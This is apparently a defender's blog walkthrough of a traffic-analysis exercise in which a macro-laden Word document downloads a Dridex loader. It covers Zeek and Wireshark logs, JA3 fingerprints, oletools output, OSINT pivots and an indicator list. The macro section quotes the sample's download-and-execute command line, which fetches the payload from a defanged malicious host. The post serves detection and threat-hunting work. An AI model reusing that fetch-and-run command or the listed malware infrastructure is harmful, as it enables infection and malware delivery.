Malware Traffic Analysis

I’ve been meaning to get around to doing one of these in a public blog for a bit, so I figured I would pick one of the more involved examples from Brad’s blog: https://www.malware-traffic-analysis.net/2020/02/21/index.html

Shout out @malwaretraffic

I will not be going through how to use each tool other than some broad recommendations, but it should be a good overview for those new to the practice. Throughout normal analysis you wouldn’t often use multiple tools to accomplish the same thing, but I feel it’s important to get people away from the continued reliance on just using one thing; in this instance, only using Wireshark for PCAPs.

One of the major pitfalls I see with newer analysts or people not comfortable venturing into more complete analysis pathways is this idea that once you have indicators from a given sample or PCAP, you can just stop — this is bad practice and will often leave you blind related to the full scope of a given campaign or attacker infrastructure (owned or utilized). As you will see in the OSINT section, I was able to greatly expand the analysis dataset far beyond the indicators related to the initial bin and indicators.

Further note: this doesn’t include analysis related to samples retrieved from the impacted host, we will only analyze the PCAP and word document, stopping at the initial binary that caused the first stage outbound C2.

This thing is going to be thorough…get ready -

Tools Used:

Winitor

MalwareCantFly/Vba2Graph

The Zeek Network Security Monitor

zeek/trace-summary

Wireshark · Go Deep.

decalage2/oletools

ExifTool by Phil Harvey

0x4D31/fatt

Didier Stevens Suite

Analyst Summary

On Friday, Feb 21 at 00:55:06 (GMT) hostname DESKTOP-5NCFYEU (172.17.8[.]174) with logged in user ONE-HOT-MESS\gabriella.ventura downloaded 5c3353be0c746f65ff1bb04bd442a956fb3a2c00 (SHA1) | (Download name: yrkbdmt.bin | On-Disk:Caff54e1.exe) via an HTTP request to blueflag[.]xyz (49.51.172[.]56:80). The HTTP request was initiated as a result of a malicious macro execution; the macro was within document inv_261804.doc having hash 50ca216f6fa3219927cd1676af716dce6d0c59c2 (SHA1).

Once the initial stage 1 bin (Caff54e1.exe) was executed, there was an outbound connection to 91.211.88[.]122:443 having JA3 fingerprint 51c64c77e60f3980eea90869b68c58a8 and CN/Subject 7Meconepear.Oofwororgupssd[.]tm. This IP address, CN, certificate, and JA3 are known to be related to the Dridex malware family.

PCAP Analysis (Wireshark)

Filename: 2020–02–21-traffic-analysis-exercise.pcap
MD5:5e7bef977e00cee5142667bebe7fa637
SHA1:8cc4f935383431e4264e482cce03fec0d4b369bd
SHA256:8b984eca8fb96799a9ad7ec5ee766937e640dc1afcad77101e5aeb0ba6be137d
First packet: 2020–02–20 16:53:50
Last packet: 2020–02–20 17:14:12
Elapsed: 00:20:21

Conversations:

PCAP Conversations (sorted by packet count) — suspicious IPs highlighted

91.211.88[.]122

91.211.88[.]122 Certificate

Censys Certificate: https://censys.io/certificates/22e578e7069ff716c23304bc619376bc24df8f91265d9a10ad7c8d8d19725f6e (Subject: 7Meconepear.Oofwororgupssd[.]tm)

49.51.172[.]56

blueflag [.] xyz (DNS)

DNS:

Domain Controller: one-hot-mess-dc

SMB | NTLM Authentication (gabriella.ventura)

Username: ONE-HOT-MESS\gabriella.ventura

Hostname: DESKTOP-5NCFYEU (172.17.8[.]174)

SMB Objects:

HTTP Objects:

blueflag [.] xyz HTTP object

Filename: yrkbdmt.bin

Filename: yrkbdmt.bin
MD5:64aabb8c0ca6245f28dc0d7936208706
SHA1:5c3353be0c746f65ff1bb04bd442a956fb3a2c00
SHA256:03c962ebb541a709b92957e301ea03f1790b6a57d4d0605f618fb0be392c8066
Imphash:b54271bcaf179ca994623a6051fbc2ba
SSDEEP:6144:vDwYweNHD22Pw2VcYDyw0pkBn88oXhp97:v9LH5YQcYDNakBmhp97
Authentihash:9a91e94cd20b9c9ff84b2d1f43921d8e2ccb5d794277e7ea74a3c52063b69c4e

PCAP Analysis (ZEEK)

There are many more things Zeek is capable of, but for the purpose of this analysis exercise, we will be sticking with the basics. The results of this basic command will return similar results, but it is important to know how to use multiple tools to accomplish a task.

Trace Summary:

Command: trace-summary 2020–02–21-traffic-analysis-exercise.pcap

trace-summary output

Command: zeek -r ../2020–02–21-traffic-analysis-exercise.pcap

zeek command output files

conn.log

1582246506.453005 CpfJAf1qEAH2pqe46a 172.17.8.174 49731 49.51.172.56 80 tcp http 2.172008 178 209164 SF — — 0 ShADadfF 60 2590 173 216088 -

dce_rpc.log

1582246432.367241 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000133 49670 netlogon NetrServerReqChallenge
1582246432.367471 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000382 49670 netlogon NetrServerAuthenticate3
1582246432.368397 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000138 49670 netlogon NetrLogonGetCapabilities
1582246432.372826 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000499 49670 netlogon NetrLogonGetDomainInfo

From these logs we can determine 172.17.8.8 is the primary DC within the PCAP and 172.17.8.174 is the primary end user host.

dhcp.log (nothing of note)

dns.log

1582246506.138612 C6Mhly4WIz8QvLK6Qb 172.17.8.174 62187 172.17.8.8 53 udp 23409 0.308516 blueflag[.]xyz 1 C_INTERNET 1 A 0 NOERROR F F T T 0 49.51.172.56 598.000000 F

The only malicious query seen in the context of the log is for the blueflag domain — all others are internal or related to known Microsoft Traffic.

files.log

1582246507.033989 Fxn5Bv18iRBhpzhfwb 49.51.172.56 172.17.8.174 CpfJAf1qEAH2pqe46a HTTP 0 PE application/x-dosexec — 1.590656 — F 208896 208896 0 0 F — — — — — — -

http.log

1582246506.703102 CpfJAf1qEAH2pqe46a 172.17.8.174 49731 49.51.172.56 80 1 GET blueflag[.]xyz /nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin — 1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) — 0 208896 200 OK — — (empty) — — — — — — Fxn5Bv18iRBhpzhfwb — application/x-dosexec

kerberos.log

1582246452.084558 Cgr6Sd4lqWwIcT3cOi 172.17.8.174 49706 172.17.8.8 88 AS gabriella.ventura/ONE-HOT-MESS krbtgt/ONE-HOT-MESS F KDC_ERR_PREAUTH_REQUIRED — 2136422885.000000 — T T — — — -
1582246452.096627 CCcaix1sHnsaEYxbCa 172.17.8.174 49707 172.17.8.8 88 AS gabriella.ventura/ONE-HOT-MESS krbtgt/ONE-HOT-MESS.NET T — — 2136422885.000000 aes256-cts-hmac-sha1–96 T T — — — -
1582246452.098261 CCXtOi4Xb0XxMtWMn4 172.17.8.174 49708 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET host/desktop-tzmkhkc.one-hot-mess.com T — — 2136422885.000000 aes256-cts-hmac-sha1–96 T T — — — -
1582246452.170451 CpndUZ3T4klIWP5n5a 172.17.8.174 49709 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET LDAP/One-Hot-Mess-DC.one-hot-mess.com/one-hot-mess.com T — — 2136422885.000000 aes256-cts-hmac-sha1–96 T T — — — -

1582246452.309416 CKu8Rv2Vtlp6vjuyt1 172.17.8.174 49713 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET cifs/One-Hot-Mess-DC T — — 2136422885.000000 aes256-cts-hmac-sha1–96 T T — — — -
1582246452.312945 CCwlke1jlebCOwvDhj 172.17.8.174 49714 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET krbtgt/ONE-HOT-MESS.NET T — — 2136422885.000000 aes256-cts-hmac-sha1–96 T T — — — -

ntlm.log

1582246452.212377 ClaKGC4wr7V05UDUJ4 172.17.8.174 49710 172.17.8.8 445 gabriella.ventura DESKTOP-5NCFYEU ONE-HOT-MESS ONE-HOT-MESS-DC One-Hot-Mess-DC.one-hot-mess.com one-hot-mess.com T

packet_filter.log (no filter applied)

pe.log

1582246507.044206 Fxn5Bv18iRBhpzhfwb I386 1582162883.000000 Windows 2000 WINDOWS_CUI T F T T F T T F F T .text,.idata,.data,.idata,.reloc,.rsrc,.reloc

smb_files.log (nothing of interest outside of DC related files)

smb_mapping.log (nothing of interest outside of DC related files)

ssl.log

1582247508.600095 Ct7Ee81Ox6dlpPr438 172.17.8.174 49760 91.211.88.122 443 TLSv12 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 secp256r1 — F — — T FdN4D73zOqnyNfFnlb (empty) CN=7Meconepear.Oofwororgupssd[.]tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT CN=7Meconepear.Oofwororgupssd.tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT — -

weird.log (nothing of note)

x509.log

1582247508.890169 FdN4D73zOqnyNfFnlb 3 FD0AC1D1629BFE9F CN=7Meconepear.Oofwororgupssd[.]tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT CN=7Meconepear.Oofwororgupssd.tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT 1582211708.000000 1597932908.000000 rsaEncryption sha256WithRSAEncryption rsa 2048 65537 — — — — — T -

JA3

More info on JA3/JA3s here: https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967?gi=c6dd5a5ad356

Command: python3 fatt.py -fp tls -r 2020–02–21-traffic-analysis-exercise.pcap -p | awk ‘{ print $5}’ | sort -u | grep “ja3=”|rg -oe ‘[^=]+$’

Result:

28a2c9bd18a11de089ef85a160da29e4 (Microsoft Traffic — non malicious)
37f463bf4616ecd445d4a1937da06e19 (Microsoft Traffic — non malicious)
3b5074b1b5d032e5620f69f9f700ff0e (Microsoft Traffic — non malicious)
9e10692f1b7f78228b2d4e424db3a98c (Microsoft Traffic — non malicious)
a0e9f5d64349fb13191bc781f81f42e1 (Microsoft Traffic — non malicious)

51c64c77e60f3980eea90869b68c58a8 (Malicious)

Context:

172.17.8.174:49760 -> 91.211.88[.]122:443 [TLS] ja3=51c64c77e60f3980eea90869b68c58a8 serverName=

Ref: https://sslbl.abuse.ch/ja3-fingerprints/51c64c77e60f3980eea90869b68c58a8/

SSL Blacklist JA3: 51c64c77e60f3980eea90869b68c58a8

JA3S

Command: python3 fatt.py -fp tls -r 2020–02–21-traffic-analysis-exercise.pcap -p | awk ‘{ print $5}’ | sort -u | grep “ja3s=”|rg -oe ‘[^=]+$’

Result (only showing malicious):
e35df3e00ca4ef31d42b34bebaa2f86e

Context:

91.211.88[.]122:443 -> 172.17.8.174:49760 [TLS] ja3s=e35df3e00ca4ef31d42b34bebaa2f86e

Suricata Alerts

*Note* you can always pass a PCAP to the Suricata daemon to see what alerts would trigger, but Brad was nice enough to share them in an archive.

Based on what Brad shared from the network capture, here are the relevant alerts that triggered and what they mean:

Suricata Alerts (from archive)

ET POLICY Binary Download Smaller than 1 MB Likely Hostile

49.51.172[.]56 -> 172.17.8.174 (Binary download with size less than 1 MB)

ET POLICY PE EXE or DLL Windows file download HTTP (Binary Download, defined by Header)

49.51.172[.]56 -> 172.17.8.174

ET CURRENT_EVENTS WinHttpRequest Downloading EXE (HTTP request using the WinHttpRequest User-Agent-String)

49.51.172[.]56 -> 172.17.8.174

ET CURRENT_EVENTS Likely Evil EXE download from WinHttpRequest non-exe extension (HTTP request using the WinHttpRequest User-Agent-String — requested file doesn’t have .exe file extension)

49.51.172[.]56 -> 172.17.8.174

ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) (malicious SSL certificate observed in the context of session; based on the SHA1 of the certificate within the context of this listing: https://sslbl.abuse.ch/blacklist/sslblacklist.csv)

91.211.88[.]122 -> 172.17.8.174

Sample Analysis (Word Doc)

Filename: inv_261804.doc
MD5:487ea5406a04bc22a793142b5ab87de6
SHA1:50ca216f6fa3219927cd1676af716dce6d0c59c2
SHA256:01ea3845eac489a2518962e6a9f968cde0811e1531f5a58718fb02cf62541edc

Dynamic Execution Reports:

inv_261804.doc (MD5: 487EA5406A04BC22A793142B5AB87DE6) - Interactive analysis - ANY.RUN

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis…

VirusTotal

Relevant Exiftool Output:

File Type: DOCM
File Type Extension: docm
MIME Type: application/vnd.ms-word.document.macroEnabled
Total Edit Time: 0
Pages: 2
Words: 2
Characters: 18
Application: Microsoft Office Word
Doc Security: Password protected
Lines: 1
Paragraphs: 1
Scale Crop: No
Heading Pairs: Title, 1, Название, 1 (Название == Title)
Titles Of Parts: ,
Characters With Spaces: 19
App Version: 12.0000
Creator:
Last Modified By:
Revision Number: 1

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

VBA Bin

Filename: vbaProject.bin
MD5:efdd4e5cb3e60824c9109b2ccbafed58
SHA1:ebaab69446fbf4dcf7efbd232048eac53d3f09fb
SHA256: a03ea3f665e90ad0e17f651c86f122e6b6c9959ef5c82139720ebb433fc00993
SSDEEP: 1536:LDL4uQGjj6u2o6jqZeZtPanlEnULSMcehZ0N1QG7MvEN5tUnYLNH1zN6sffvfN0Q:j0G6u2oAqsP8inULtcehZ0N1QG7MvENg

Embedded Image

image1.png

Filename: image1.png
MD5:f4ba1757dcca0a28b2617a17134d3f31
SHA1:45853a83676b5b0b1a1a28cd60243a3ecf2f2e7a
SHA256:f73ebad98d0b1924078a8ddbde91de0cf47ae5d598d0aeb969e145bd472e4757

Command: olevba -a inv_261804.doc

olevba output

Non-empty macros:

OLE stream: ‘VBA/traditional_food’

OLE stream: ‘VBA/Modules’

OLE stream: ‘VBA/Variable’

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Command: python3 oledump.py inv_261804.doc

oledump output

oledir output (1/2)

oledir output (2/2)

oletimes output

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Using either olevba or oledump, dump the relevant [M] streams: 17,19,26

Example command:

python3 oledump.py -s 26 -v inv_261804.doc > stream_26.vba

Streams

Stream 17

Stream17 Flow Graph (built with VBA2Graph)

stream 17 | VBA/Modules

Stream 19

Stream 19 Flow Graph (built with VBA2Graph)

stream 19 | VBA/Variable

The real meat of what the macros are doing is within stream26 (“traditional food”), but since it’s rather large (348 lines), I am going to highlight sections of interest…

26

Stream 26 Flow Graph (built with VBA2Graph)

stream26 overview

The multiple (seemingly repetitive) lines you see in the overview above are being used to build buffers to be output as commands. As you can see by the multiple lines, they are iterating over string buffers, a rather garbage way of doing this — one of two things is true: 1. they are attempting to bypass mitigating controls (e.g. AV) 2. they are horrible at writing macros — or ya know, both.

VBA7 Check

The first thing we see is conditional function declarations dependent on the version of VBA in use on the target system:

stream26 | if VBA7

VBA7 was initially introduced way back when to deal with the introduction of Office 2010 (64-bit) (link). You will see differences in the declarations, with the primary change if it detects VBA7 being the usage of the PtrSafe keyword and LongPtr rather than the older declaration style of a standard Long.

Hidden Window

stream26 | Hidden Window

The Private Const declarations reveal the developer wants the window to remain hidden in the context of the macro execution by giving SW_HIDE the 0 value. More info on these declarations here.

Directory/File Creation

stream26 | CreateBasicDirectory()

The output of the macro seen in stream 26 generates 4 cmd files:

bufferForCmd4 = “C:\DecemberLogs\Restaraunt4.cmd”
bufferForCmd1 = “C:\DecemberLogs\Restaraunt1.cmd”
bufferForCmd2 = “C:\DecemberLogs\Restaraunt2.cmd”
bufferForCmd3 = “C:\DecemberLogs\Restaraunt3.cmd”

Note: you may noticed the dev spelled “Restaraunt” incorrectly — this is a good string pivot for static hunting (wink)

Restaraunt2.cmd is the most active cmd, here are the relevant things it does:

Set MyVarname1 = Wscript.Arguments >> %namerestaraunt%

set namerestaraunt=C:\DecemberLogs\OliviaMatter.vbs

CreateObject(“WinHttp.WinHttpRequest.5.1”)

“GET”

CreateObject(“ADODB.Stream”)

CreateObject(“Scripting.FileSystemObject”)

wscript //nologo c:\DecemberLogs\OliviaMatter.vbs hxxp://blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin C:\DecemberLogs\Caff54e1.exe

• the downloaded file (yrkbdmt.bin) is named as Caff54e1.exe on disk

The text you notice within this cmd is taken from this site: hxxps://www.purpletables[.]com/for-restaurants

Sample Analysis (EXE)

Filename: Caff54e1.exe

Family: Dridex (Loader)

ITW Host URL(s):
* hxxp://shameonyou[.]xyz/wBNPADvPLRDHrvqjFnEV/hjjalma.bin
* hxxp://blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin

Compile Time: 2020–02–20 01:41:23
Compiler: Microsoft Visual C/C++(2010 SP1)[-]
Linker Version: 12.0 — (Visual Studio 2013)
Type/Magic: PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:64aabb8c0ca6245f28dc0d7936208706
SHA-1:5c3353be0c746f65ff1bb04bd442a956fb3a2c00
SHA-256: 03c962ebb541a709b92957e301ea03f1790b6a57d4d0605f618fb0be392c8066
SSDEEP:6144:vDwYweNHD22Pw2VcYDyw0pkBn88oXhp97:v9LH5YQcYDNakBmhp97MD5:64aabb8c0ca6245f28dc0d7936208706

LegalCopyright: Copyright © 1990–2018 Citrix Systems, Inc.
InternalName: VDIME
FileVersion: 14.12.0.18020
CompanyName: Citrix Systems, Inc.
ProductName: Citrix Receiver
ProductVersion: 14.12.0
FileDescription: Citrix Receiver VDIME Resource DLL (Win32) OriginalFilename: VDIME.DLL

More info about the legit dll being impersonated: https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/configure-xenapp.html

Resources:

Chinese Language String Table (pestudio)

Related Samples by Resource Hash (SHA1):

VT Search

resource:”dfa16393a68aeca1ca60159a8cd4d01a92bfffbe260818f76b81b69423cde80c”

0585cabaf327a8d2c41bfb4882b8f0cd550883cd
d0d571ed6b3780a399caacc88d764ee63426e788
d5f5508d82719d4b290b99adab72dd26af7c31fe
37fe041467a245cdaf50ff2deb617c5097ab30b2
b5e97e1c8fca92aceb4f27b69d0252b5ffc25c03
2644dd2af154160f6ac1045e2d13c364e879a8f0
5b4cb9dcbf7b176e226c2f46a2970017d2fe2fab
d0bbd4c5ac4d368026160419e95f381f72a1b739

Behavioral Report: https://app.any.run/tasks/e35311cc-7cb0-4030-be20-9811c6bf3d9a/

Outbound Indicators:
91.211.88[.]122:443
107.161.30[.]122:8443
188.166.25[.]84:3886
87.106.7[.]163:3886

Related Tweet:

Dridex Loader Tweet | Feb 21, 2020

OSINT fun

91.211.88[.]122

BGP Info

BGP Info | admin@netengi[.]ua

RIPE Info:

Ripe Contact information Netengi

If you look specifically at the ASN description, it points to hostfory:

IPv4 Prefixes: https://bgpview.io/asn/206638#prefixes-v4

hostfory[.]com

Certificate History

1Parestheal[.]game | Serial: 11971436208849434435

7Meconepear[.]Oofwororgupssd[.]tm | Serial: 18233599146409590431

hanghatangth[.]bt | Serial: 18131378021111808658

lonfly3thefsh[.]career | Serial: 10185256865510501056

Mndr7tiran[.]Nghinbrigeme[.]nadex | Serial: 14635583652517608224

thit[.]ademw[.]4Atewbanedebr[.]bid | Serial: 11056302915576178158

Shodan History

It’s always important to check multiple services (eg: Censys, Shodan, BinaryEdge) to try and figure out when a host first came online, and more importantly the first time it was seen in the context you observed during analysis. For this exercise, we saw the 91.* address using port 443, and the timestamps closely align with the traffic we observed in the PCAP.

shodan host — history 91.211.88[.]122 | grep ‘80/\|443’

blueflag[.]xyz

RiskIQ PassiveTotal | blueflag Resolve History

49[.]51.172.56

RiskIQ PassiveTotal | 49[.]51.172.56 Resolve History

Domains

asmarlife[.]com
lndeed[.]press
secure[.]lndeed[.]tech
root[.]lndeed[.]press
lndeed[.]tech
secure[.]lndeed[.]press
lsarta[.]ca
emplois[.]lsarta[.]ca
*[.]lsarta[.]ca
shameonyou[.]xyz
blueflag[.]xyz
www[.]shameonyou[.]xyz
warmsun[.]xyz
mineminecraft[.]xyz
smokesome[.]xyz
deeppool[.]xyz
www[.]asmarlife[.]com

BGP Info

BGP Info

Shodan Host information

shodan host — history 49.51.172[.]56 | grep “80/\|443”

Related Packet Captures

PacketTotal - eb0d254670d7bc649a42abb137a50acc Analysis

PacketTotal - 5e7bef977e00cee5142667bebe7fa637 Analysis

Actionable IOCs

Hashes (SHA1)
ebaab69446fbf4dcf7efbd232048eac53d3f09fb (vbaProject.bin)
5c3353be0c746f65ff1bb04bd442a956fb3a2c00 (Caff54e1.exe)
45853a83676b5b0b1a1a28cd60243a3ecf2f2e7a (embedded PNG)

JA3 Fingerprints (w/ IP) — malicious
51c64c77e60f3980eea90869b68c58a8 (91.211.88[.]122:443)

JA3s Fingerprints — malicious
e35df3e00ca4ef31d42b34bebaa2f86e (91.211.88[.]122:443)

Domains
blueflag[.]xyz
smokesome[.]xyz
shameonyou[.]xyz

URLs
blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin
shameonyou[.]xyz/wBNPADvPLRDHrvqjFnEV/hjjalma.bin

IPs
49[.]51.172.56:80 (initial payload download)
91.211.88[.]122:443 (post execution C2 | Dridex)
107.161.30[.]122:8443 (post execution C2| Dridex)
188.166.25[.]84:3886 (post execution C2| Dridex)
87.106.7[.]163:3886 (post execution C2| Dridex)

Directories
c:\DecemberLogs\*

Filenames
Caff54e1.exe
OliviaMatter.vbs
Restaraunt1.cmd
Restaraunt2.cmd
Restaraunt3.cmd
Restaraunt4.cmd

Related Samples (SHA1)

(Related by outbound network indicator: 49.51.172[.]56)

bef048ef2f1897c334b0d158b4c8cd7c40e7eb96 (deeppool[.]xyz)
eab4705f18ee91e5b868444108aeab5ab3c3d480 (deeppool[.]xyz)

(Related by Directory Creation “DecemberLogs”)

3e85ad7548cd175cf418ea6c5b84790849c97973 (lialer[.]com)

• (pDNS: 8.208.78[.]91)

fddc300433eabd0a5893f70679f05ad5e9af44f2 (smokingpot[.]xyz)

• (pDNS: 8.208.78[.]248)

cabc1ac7b00e7d29ca7d2b77ddd568b3ef1274da (macyranch[.]com)

• (pDNS: 47.90.206[.]16)

(Related by Chinese-simplified resource string table SHA256 Hash)

0585cabaf327a8d2c41bfb4882b8f0cd550883cd
d0d571ed6b3780a399caacc88d764ee63426e788 (dynamic)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

d5f5508d82719d4b290b99adab72dd26af7c31fe
Host URL: hxxp://sulainul[.]com/esdfrtDERGTYuicvbnTYUv/gspqm.exe
Host URL: hxxp://hindold[.]com/esdfrtDERGTYuicvbnTYUv/gspqm.exe

Example Source Email (attachment: filename=”invoice_650014.xls”)

• From: “Constancia Jenelle” <alla.petrovna[@]client.civiltoolspro[.]com>
• Subject: Invoice Due No.
• Reply-To: justinareaves[@]theheartofok[.]com

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
37fe041467a245cdaf50ff2deb617c5097ab30b2
b5e97e1c8fca92aceb4f27b69d0252b5ffc25c03
2644dd2af154160f6ac1045e2d13c364e879a8f0
5b4cb9dcbf7b176e226c2f46a2970017d2fe2fab
d0bbd4c5ac4d368026160419e95f381f72a1b739 (dynamic)

Related Domains

Related by pDNS resolution history of 49[.]51.172.56:

asmarlife[.]com
lndeed[.]press
secure[.]lndeed[.]tech
root[.]lndeed[.]press
lndeed[.]tech
secure[.]lndeed[.]press
lsarta[.]ca
emplois[.]lsarta[.]ca
*[.]lsarta[.]ca
shameonyou[.]xyz
www[.]shameonyou[.]xyz
warmsun[.]xyz
mineminecraft[.]xyz
smokesome[.]xyz
deeppool[.]xyz
www[.]asmarlife[.]com

Related by pDNS resolution history of 8.208.78[.]91:

telakus[.]com
frogistik99[.]com
rilaer[.]com
lialer[.]com
*.frogistik99[.]com
lerlia[.]com
*.rilaer[.]com
*.lerlia[.]com

Certificate Common Names (CN)

1Parestheal[.]game — (Associated Infra: 91.211.88[.]122)
7Meconepear[.]Oofwororgupssd[.]tm — (Associated Infra: 91.211.88[.]122)
hanghatangth[.]bt — (Associated Infra: 91.211.88[.]122)
lonfly3thefsh[.]career — (Associated Infra: 91.211.88[.]122)
Mndr7tiran[.]Nghinbrigeme[.]nadex — (Associated Infra: 91.211.88[.]122)
thit[.]ademw[.]4Atewbanedebr[.]bid — (Associated Infra: 91.211.88[.]122)

Related by associated hash hosting URL domain (47.252.13[.]182):

paskelupins[.]online
www[.]paskelupins[.]online
hindold[.]com
sulainul[.]com
www[.]hindold[.]com
cloudmgrtracker[.]com
staitonfresk[.]site
*[.]staitonfresk[.]site
zxc[.]global
maramarket[.]site
www[.]staitonfresk[.]site
xn — cinbse-lua6k[.]com
blockachaln[.]com
sucuritester[.]com
animal-planet[.]site
astritbull[.]site
logln-blockchalne[.]com
www[.]operstik[.]site
operstik[.]site
v-gate[.]club
47[.]252[.]13[.]182\032www[.]hpsupport[.]site
hpsupport[.]site
kossmoss[.]space
ssaite[.]site
www[.]kossmoss[.]space

Hunting Pivots

• “Restaraunt” typo within ole stream (macro)
• Impersonation of VDIME.DLL Citrix Receiver DLL
• VBA macro bin (SHA1): ebaab69446fbf4dcf7efbd232048eac53d3f09fb
• First Stage Downloader UAS: WinHttp.WinHttpRequest.5.1
• Directory Create: DecemberLogs

Metadata (source doc)

• Total Edit Time: 0
  Pages: 2
  Words: 2
  Characters: 18
  Heading Pairs: Title, 1, Название, 1

Hosting Infrastructure: hostfory (Ukraine) | 91.211.88[.]0/22